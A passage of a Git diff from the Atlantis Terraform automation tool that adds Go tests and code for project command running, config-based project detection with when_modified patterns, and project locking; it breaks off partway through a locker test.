+ expSteps []string
+ expOut string
+ }{
+ {
+ description: "use defaults",
+ projCfg: nil,
+ globalCfg: nil,
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "no workflow, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ },
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "workflow without plan stage set",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "workflow with custom plan stage",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ },
+ {
+ StepName: "apply",
+ },
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ },
+ expSteps: []string{"run", "apply", "plan", "init"},
+ expOut: "run\napply\nplan\ninit",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockInit := mocks.NewMockStepRunner()
+ mockPlan := mocks.NewMockStepRunner()
+ mockApply := mocks.NewMockStepRunner()
+ mockRun := mocks.NewMockStepRunner()
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockLocker := mocks.NewMockProjectLocker()
+
+ runner := events.DefaultProjectCommandRunner{
+ Locker: mockLocker,
+ LockURLGenerator: mockURLGenerator{},
+ InitStepRunner: mockInit,
+ PlanStepRunner: mockPlan,
+ ApplyStepRunner: mockApply,
+ RunStepRunner: mockRun,
+ PullApprovedChecker: nil,
+ WorkingDir: mockWorkingDir,
+ Webhooks: nil,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ }
+
+ repoDir := "/tmp/mydir"
+ When(mockWorkingDir.Clone(
+ matchers.AnyPtrToLoggingSimpleLogger(),
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsPullRequest(),
+ AnyString(),
+ )).ThenReturn(repoDir, nil)
+ When(mockLocker.TryLock(
+ matchers.AnyPtrToLoggingSimpleLogger(),
+ matchers.AnyModelsPullRequest(),
+ matchers.AnyModelsUser(),
+ AnyString(),
+ matchers.AnyModelsProject(),
+ )).ThenReturn(&events.TryLockResponse{
+ LockAcquired: true,
+ LockKey: "lock-key",
+ }, nil)
+
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ ProjectConfig: c.projCfg,
+ Workspace: "default",
+ GlobalConfig: c.globalCfg,
+ RepoRelDir: ".",
+ }
+ When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+ When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+ When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+ When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+
+ res := runner.Plan(ctx)
+
+ Assert(t, res.PlanSuccess != nil, "exp plan success")
+ Equals(t, "https://lock-key", res.PlanSuccess.LockURL)
+ Equals(t, c.expOut, res.PlanSuccess.TerraformOutput)
+
+ for _, step := range c.expSteps {
+ switch step {
+ case "init":
+ mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "plan":
+ mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "apply":
+ mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "run":
+ mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ }
+ }
+ })
+ }
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotCloned(t *testing.T) {
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ runner := &events.DefaultProjectCommandRunner{
+ WorkingDir: mockWorkingDir,
+ }
+ ctx := models.ProjectCommandContext{}
+ When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("", os.ErrNotExist)
+
+ res := runner.Apply(ctx)
+ ErrEquals(t, "project has not been cloned–did you run plan?", res.Error)
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotApproved(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockApproved := mocks2.NewMockPullApprovedChecker()
+ runner := &events.DefaultProjectCommandRunner{
+ WorkingDir: mockWorkingDir,
+ PullApprovedChecker: mockApproved,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ RequireApprovalOverride: true,
+ }
+ ctx := models.ProjectCommandContext{}
+ When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("/tmp/mydir", nil)
+ When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(false, nil)
+
+ res := runner.Apply(ctx)
+ Equals(t, "Pull request must be approved before running apply.", res.Failure)
+}
+
+func TestDefaultProjectCommandRunner_Apply(t *testing.T) {
+ cases := []struct {
+ description string
+ projCfg *valid.Project
+ globalCfg *valid.Config
+ expSteps []string
+ expOut string
+ }{
+ {
+ description: "use defaults",
+ projCfg: nil,
+ globalCfg: nil,
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "no workflow, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ },
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "no workflow, approval required, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ ApplyRequirements: []string{"approved"},
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ },
+ expSteps: []string{"approved", "apply"},
+ expOut: "apply",
+ },
+ {
+ description: "workflow without apply stage set",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Plan: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "workflow with custom apply stage",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ },
+ {
+ StepName: "apply",
+ },
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ },
+ expSteps: []string{"run", "apply", "plan", "init"},
+ expOut: "run\napply\nplan\ninit",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockInit := mocks.NewMockStepRunner()
+ mockPlan := mocks.NewMockStepRunner()
+ mockApply := mocks.NewMockStepRunner()
+ mockRun := mocks.NewMockStepRunner()
+ mockApproved := mocks2.NewMockPullApprovedChecker()
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockLocker := mocks.NewMockProjectLocker()
+ mockSender := mocks.NewMockWebhooksSender()
+
+ runner := events.DefaultProjectCommandRunner{
+ Locker: mockLocker,
+ LockURLGenerator: mockURLGenerator{},
+ InitStepRunner: mockInit,
+ PlanStepRunner: mockPlan,
+ ApplyStepRunner: mockApply,
+ RunStepRunner: mockRun,
+ PullApprovedChecker: mockApproved,
+ WorkingDir: mockWorkingDir,
+ Webhooks: mockSender,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ }
+
+ repoDir := "/tmp/mydir"
+ When(mockWorkingDir.GetWorkingDir(
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsPullRequest(),
+ AnyString(),
+ )).ThenReturn(repoDir, nil)
+
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ ProjectConfig: c.projCfg,
+ Workspace: "default",
+ GlobalConfig: c.globalCfg,
+ RepoRelDir: ".",
+ }
+ When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+ When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+ When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+ When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+ When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(true, nil)
+
+ res := runner.Apply(ctx)
+ Equals(t, c.expOut, res.ApplySuccess)
+
+ for _, step := range c.expSteps {
+ switch step {
+ case "approved":
+ mockApproved.VerifyWasCalledOnce().PullIsApproved(ctx.BaseRepo, ctx.Pull)
+ case "init":
+ mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "plan":
+ mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "apply":
+ mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "run":
+ mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ }
+ }
+ })
+ }
+}
+
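+// mockURLGenerator returns a predictable lock URL so tests can assert on it.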
+type mockURLGenerator struct{}
+
+func (m mockURLGenerator) GenerateLockURL(lockID string) string {
+ return "https://" + lockID
+}
diff --git a/server/events/project_finder.go b/server/events/project_finder.go
index e14c3b7e72..07dfcd6c64 100644
--- a/server/events/project_finder.go
+++ b/server/events/project_finder.go
@@ -19,7 +19,10 @@ import (
"path/filepath"
"strings"
+ "github.com/docker/docker/pkg/fileutils"
+ "github.com/pkg/errors"
"github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
"github.com/runatlantis/atlantis/server/logging"
)
@@ -30,6 +33,7 @@ type ProjectFinder interface {
// DetermineProjects returns the list of projects that were modified based on
// the modifiedFiles. The list will be de-duplicated.
DetermineProjects(log *logging.SimpleLogger, modifiedFiles []string, repoFullName string, repoDir string) []models.Project
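+ // DetermineProjectsViaConfig returns the list of projects that were modified
+ // based on modifiedFiles and the repo's atlantis.yaml config.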
+ DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error)
}
// DefaultProjectFinder implements ProjectFinder.
@@ -49,22 +53,72 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi
log.Info("filtered modified files to %d .tf files: %v",
len(modifiedTerraformFiles), modifiedTerraformFiles)
- var paths []string
+ var dirs []string
for _, modifiedFile := range modifiedTerraformFiles {
- projectPath := p.getProjectPath(modifiedFile, repoDir)
- if projectPath != "" {
- paths = append(paths, projectPath)
+ projectDir := p.getProjectDir(modifiedFile, repoDir)
+ if projectDir != "" {
+ dirs = append(dirs, projectDir)
}
}
- uniquePaths := p.unique(paths)
- for _, uniquePath := range uniquePaths {
- projects = append(projects, models.NewProject(repoFullName, uniquePath))
+ uniqueDirs := p.unique(dirs)
+
+ // The list of modified files will include files that were deleted. We still
+ // want to run plan if a file was deleted since that often results in a
+ // change; however, we want to remove directories that have been completely
+ // deleted.
+ exists := p.filterToDirExists(uniqueDirs, repoDir)
+
+ for _, p := range exists {
+ projects = append(projects, models.NewProject(repoFullName, p))
}
log.Info("there are %d modified project(s) at path(s): %v",
- len(projects), strings.Join(uniquePaths, ", "))
+ len(projects), strings.Join(exists, ", "))
return projects
}
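+
+// DetermineProjectsViaConfig implements ProjectFinder.DetermineProjectsViaConfig.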
+func (p *DefaultProjectFinder) DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error) {
+ var projects []valid.Project
+ for _, project := range config.Projects {
+ log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
+ if !project.Autoplan.Enabled {
+ log.Debug("autoplan disabled, ignoring")
+ continue
+ }
+ // Prepend the project dir to the when_modified patterns because the
+ // patterns are relative to the project dir, but our list of modified files
+ // is relative to the repo root.
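+ // For example, a project at dir "project1" with pattern "*.tf" produces
+ // the pattern "project1/*.tf".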
+ var whenModifiedRelToRepoRoot []string
+ for _, wm := range project.Autoplan.WhenModified {
+ whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm))
+ }
+ pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot)
+ if err != nil {
+ return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified)
+ }
+
+ // If any of the modified files matches the pattern then this project is
+ // considered modified.
+ for _, file := range modifiedFiles {
+ match, err := pm.Matches(file)
+ if err != nil {
+ log.Debug("match err for file %q: %s", file, err)
+ continue
+ }
+ if match {
+ log.Debug("file %q matched pattern", file)
+ _, err := os.Stat(filepath.Join(repoDir, project.Dir))
+ if err == nil {
+ projects = append(projects, project)
+ } else {
+ log.Debug("project at dir %q not included because dir does not exist", project.Dir)
+ }
+ break
+ }
+ }
+ }
+ return projects, nil
+}
+
func (p *DefaultProjectFinder) filterToTerraform(files []string) []string {
var filtered []string
for _, fileName := range files {
@@ -84,12 +138,12 @@ func (p *DefaultProjectFinder) isInExcludeList(fileName string) bool {
return false
}
-// getProjectPath attempts to determine based on the location of a modified
+// getProjectDir attempts to determine based on the location of a modified
// file, where the root of the Terraform project is. It also attempts to verify
// if the root is valid by looking for a main.tf file. It returns a relative
-// path. If the project is at the root returns ".". If modified file doesn't
-// lead to a valid project path, returns an empty string.
-func (p *DefaultProjectFinder) getProjectPath(modifiedFilePath string, repoDir string) string {
+// path from the repo root. If the project is at the root, returns ".". If the
+// modified file doesn't lead to a valid project path, returns an empty string.
+func (p *DefaultProjectFinder) getProjectDir(modifiedFilePath string, repoDir string) string {
dir := path.Dir(modifiedFilePath)
if path.Base(dir) == "env" {
// If the modified file was inside an env/ directory, we treat this
@@ -159,3 +213,14 @@ func (p *DefaultProjectFinder) unique(strs []string) []string {
}
return unique
}
+
+func (p *DefaultProjectFinder) filterToDirExists(relativePaths []string, repoDir string) []string {
+ var filtered []string
+ for _, pth := range relativePaths {
+ absPath := filepath.Join(repoDir, pth)
+ if _, err := os.Stat(absPath); !os.IsNotExist(err) {
+ filtered = append(filtered, pth)
+ }
+ }
+ return filtered
+}
diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go
index dd9af7792f..df84fd0945 100644
--- a/server/events/project_finder_test.go
+++ b/server/events/project_finder_test.go
@@ -20,6 +20,7 @@ import (
"testing"
"github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
"github.com/runatlantis/atlantis/server/logging"
. "github.com/runatlantis/atlantis/testing"
)
@@ -30,13 +31,19 @@ var m = events.DefaultProjectFinder{}
var nestedModules1 string
var nestedModules2 string
var topLevelModules string
+var envDir string
func setupTmpRepos(t *testing.T) {
// Create different repo structures for testing.
// 1. Nested modules directory inside a project
+ // non-tf
+ // terraform.tfstate
+ // terraform.tfstate.backup
// project1/
// main.tf
+ // terraform.tfstate
+ // terraform.tfstate.backup
// modules/
// main.tf
var err error
@@ -44,10 +51,18 @@ func setupTmpRepos(t *testing.T) {
Ok(t, err)
err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700)
Ok(t, err)
- _, err = os.Create(filepath.Join(nestedModules1, "project1/main.tf"))
- Ok(t, err)
- _, err = os.Create(filepath.Join(nestedModules1, "project1/modules/main.tf"))
- Ok(t, err)
+ files := []string{
+ "non-tf",
+ "terraform.tfstate.backup",
+ "project1/main.tf",
+ "project1/terraform.tfstate",
+ "project1/terraform.tfstate.backup",
+ "project1/modules/main.tf",
+ }
+ for _, f := range files {
+ _, err = os.Create(filepath.Join(nestedModules1, f))
+ Ok(t, err)
+ }
// 2. Nested modules dir inside top-level project
// main.tf
@@ -71,6 +86,20 @@ func setupTmpRepos(t *testing.T) {
_, err = os.Create(filepath.Join(topLevelModules, path, "main.tf"))
Ok(t, err)
}
+
+ // 4. Env/ dir
+ // main.tf
+ // env/
+ // staging.tfvars
+ // production.tfvars
+ envDir, err = ioutil.TempDir("", "")
+ Ok(t, err)
+ err = os.MkdirAll(filepath.Join(envDir, "env"), 0700)
+ Ok(t, err)
+ _, err = os.Create(filepath.Join(envDir, "main.tf"))
+ Ok(t, err)
+ _, err = os.Create(filepath.Join(envDir, "env/staging.tfvars"))
+ Ok(t, err)
+ _, err = os.Create(filepath.Join(envDir, "env/production.tfvars"))
+ Ok(t, err)
}
func TestDetermineProjects(t *testing.T) {
@@ -86,13 +115,13 @@ func TestDetermineProjects(t *testing.T) {
"If no files were modified then should return an empty list",
nil,
nil,
- "",
+ nestedModules1,
},
{
"Should ignore non .tf files and return an empty list",
[]string{"non-tf"},
nil,
- "",
+ nestedModules1,
},
{
"Should plan in the parent directory from modules if that dir has a main.tf",
@@ -128,65 +157,225 @@ func TestDetermineProjects(t *testing.T) {
"Should ignore tfstate files and return an empty list",
[]string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
nil,
- "",
- },
- {
- "Should ignore tfstate files and return an empty list",
- []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
- nil,
- "",
+ nestedModules1,
},
{
"Should return '.' when changed file is at root",
[]string{"a.tf"},
[]string{"."},
- "",
+ nestedModules2,
},
{
"Should return directory when changed file is in a dir",
- []string{"parent/a.tf"},
- []string{"parent"},
- "",
+ []string{"project1/a.tf"},
+ []string{"project1"},
+ nestedModules1,
},
{
"Should return parent dir when changed file is in an env/ dir",
- []string{"env/a.tfvars"},
+ []string{"env/staging.tfvars"},
[]string{"."},
- "",
+ envDir,
},
{
"Should de-duplicate when multiple files changed in the same dir",
- []string{"root.tf", "env/env.tfvars", "parent/parent.tf", "parent/parent2.tf", "parent/child/child.tf", "parent/child/env/env.tfvars"},
- []string{".", "parent", "parent/child"},
+ []string{"env/staging.tfvars", "main.tf", "other.tf"},
+ []string{"."},
+ "",
+ },
+ {
+ "Should ignore changes in a dir that was deleted",
+ []string{"wasdeleted/main.tf"},
+ []string{},
"",
},
}
for _, c := range cases {
- t.Log(c.description)
- projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
-
- // Extract the paths from the projects. We use a slice here instead of a
- // map so we can test whether there are duplicates returned.
- var paths []string
- for _, project := range projects {
- paths = append(paths, project.Path)
- // Check that the project object has the repo set properly.
- Equals(t, modifiedRepo, project.RepoFullName)
- }
- Assert(t, len(c.expProjectPaths) == len(paths),
- "exp %d paths but found %d. They were %v", len(c.expProjectPaths), len(paths), paths)
-
- for _, expPath := range c.expProjectPaths {
- found := false
- for _, actPath := range paths {
- if expPath == actPath {
- found = true
- break
+ t.Run(c.description, func(t *testing.T) {
+ projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir)
+
+ // Extract the paths from the projects. We use a slice here instead of a
+ // map so we can test whether there are duplicates returned.
+ var paths []string
+ for _, project := range projects {
+ paths = append(paths, project.Path)
+ // Check that the project object has the repo set properly.
+ Equals(t, modifiedRepo, project.RepoFullName)
+ }
+ Assert(t, len(c.expProjectPaths) == len(paths),
+ "exp %q but found %q", c.expProjectPaths, paths)
+
+ for _, expPath := range c.expProjectPaths {
+ found := false
+ for _, actPath := range paths {
+ if expPath == actPath {
+ found = true
+ break
+ }
+ }
+ if !found {
+ t.Fatalf("exp %q but was not in paths %v", expPath, paths)
}
}
- if !found {
- t.Fatalf("exp %q but was not in paths %v", expPath, paths)
+ })
+ }
+}
+
+func TestDefaultProjectFinder_DetermineProjectsViaConfig(t *testing.T) {
+ /*
+ Create dir structure:
+
+ main.tf
+ project1/
+ main.tf
+ project2/
+ main.tf
+ modules/
+ module/
+ main.tf
+ */
+ tmpDir, cleanup := DirStructure(t, map[string]interface{}{
+ "main.tf": nil,
+ "project1": map[string]interface{}{
+ "main.tf": nil,
+ },
+ "project2": map[string]interface{}{
+ "main.tf": nil,
+ },
+ "modules": map[string]interface{}{
+ "module": map[string]interface{}{
+ "main.tf": nil,
+ },
+ },
+ })
+ defer cleanup()
+
+ cases := []struct {
+ description string
+ config valid.Config
+ modified []string
+ expProjPaths []string
+ }{
+ {
+ description: "autoplan disabled",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: false,
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "autoplan default",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: []string{"."},
+ },
+ {
+ description: "parent dir modified",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "parent dir modified matches",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project1",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"../**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf"},
+ expProjPaths: []string{"project1"},
+ },
+ {
+ description: "dir deleted",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: "project3",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"project3/main.tf"},
+ expProjPaths: nil,
+ },
+ {
+ description: "multiple projects",
+ config: valid.Config{
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"*.tf"},
+ },
+ },
+ {
+ Dir: "project1",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"../modules/module/*.tf", "**/*.tf"},
+ },
+ },
+ {
+ Dir: "project2",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ },
+ },
+ modified: []string{"main.tf", "modules/module/another.tf", "project2/nontf.txt"},
+ expProjPaths: []string{".", "project1"},
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ pf := events.DefaultProjectFinder{}
+ projects, err := pf.DetermineProjectsViaConfig(logging.NewNoopLogger(), c.modified, c.config, tmpDir)
+ Ok(t, err)
+ Equals(t, len(c.expProjPaths), len(projects))
+ for i, proj := range projects {
+ Equals(t, c.expProjPaths[i], proj.Dir)
}
- }
+ })
}
}
diff --git a/server/events/project_locker.go b/server/events/project_locker.go
new file mode 100644
index 0000000000..e6983d5c06
--- /dev/null
+++ b/server/events/project_locker.go
@@ -0,0 +1,82 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker
+
+// ProjectLocker locks this project against other plans being run until this
+// project is unlocked.
+type ProjectLocker interface {
+ // TryLock attempts to acquire the lock for this project. The returned
+ // TryLockResponse reports whether the lock was acquired and, if it wasn't,
+ // why. If the lock was acquired, the response also contains a function that
+ // can be called to release it. The error return value is set only if
+ // something went wrong while attempting to acquire the lock.
+ TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error)
+}
+
+// DefaultProjectLocker implements ProjectLocker.
+type DefaultProjectLocker struct {
+ Locker locking.Locker
+}
+
+// TryLockResponse is the result of trying to lock a project.
+type TryLockResponse struct {
+ // LockAcquired is true if the lock was acquired.
+ LockAcquired bool
+ // LockFailureReason is the reason why the lock was not acquired. It will
+ // only be set if LockAcquired is false.
+ LockFailureReason string
+ // UnlockFn will unlock the lock created by the caller. This might be called
+ // if there is an error later and the caller doesn't want to continue to
+ // hold the lock.
+ UnlockFn func() error
+ // LockKey is the key for the lock if the lock was acquired.
+ LockKey string
+}
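+
+// A sketch of typical caller usage (mirroring DefaultProjectCommandRunner.Plan):
+//
+//   resp, err := locker.TryLock(log, pull, user, workspace, project)
+//   if err != nil {
+//       // handle the error
+//   }
+//   if !resp.LockAcquired {
+//       // report resp.LockFailureReason to the user and stop
+//   }
+//   // ...run the command; if it errors, call resp.UnlockFn() to release the lock.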
+
+// TryLock implements ProjectLocker.TryLock.
+func (p *DefaultProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) {
+ lockAttempt, err := p.Locker.TryLock(project, workspace, pull, user)
+ if err != nil {
+ return nil, err
+ }
+ if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != pull.Num {
+ failureMsg := fmt.Sprintf(
+ "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.",
+ lockAttempt.CurrLock.Pull.Num)
+ return &TryLockResponse{
+ LockAcquired: false,
+ LockFailureReason: failureMsg,
+ }, nil
+ }
+ log.Info("acquired lock with id %q", lockAttempt.LockKey)
+ return &TryLockResponse{
+ LockAcquired: true,
+ UnlockFn: func() error {
+ _, err := p.Locker.Unlock(lockAttempt.LockKey)
+ return err
+ },
+ LockKey: lockAttempt.LockKey,
+ }, nil
+}
diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go
new file mode 100644
index 0000000000..232e144f50
--- /dev/null
+++ b/server/events/project_locker_test.go
@@ -0,0 +1,129 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/locking/mocks"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectLocker_TryLockWhenLocked(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: false,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: "",
+ },
+ nil,
+ )
+ res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+ Ok(t, err)
+ Equals(t, &events.TryLockResponse{
+ LockAcquired: false,
+ LockFailureReason: "This project is currently locked by #2. The locking plan must be applied or discarded before future plans can execute.",
+ }, res)
+}
+
+func TestDefaultProjectLocker_TryLockWhenLockedSamePull(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockLocker := mocks.NewMockLocker()
+ locker := events.DefaultProjectLocker{
+ Locker: mockLocker,
+ }
+ expProject := models.Project{}
+ expWorkspace := "default"
+ expPull := models.PullRequest{Num: 2}
+ expUser := models.User{}
+
+ lockingPull := models.PullRequest{
+ Num: 2,
+ }
+ lockKey := "key"
+ When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+ locking.TryLockResponse{
+ LockAcquired: false,
+ CurrLock: models.ProjectLock{
+ Pull: lockingPull,
+ },
+ LockKey: lockKey,
+ },
+ nil,
+ )
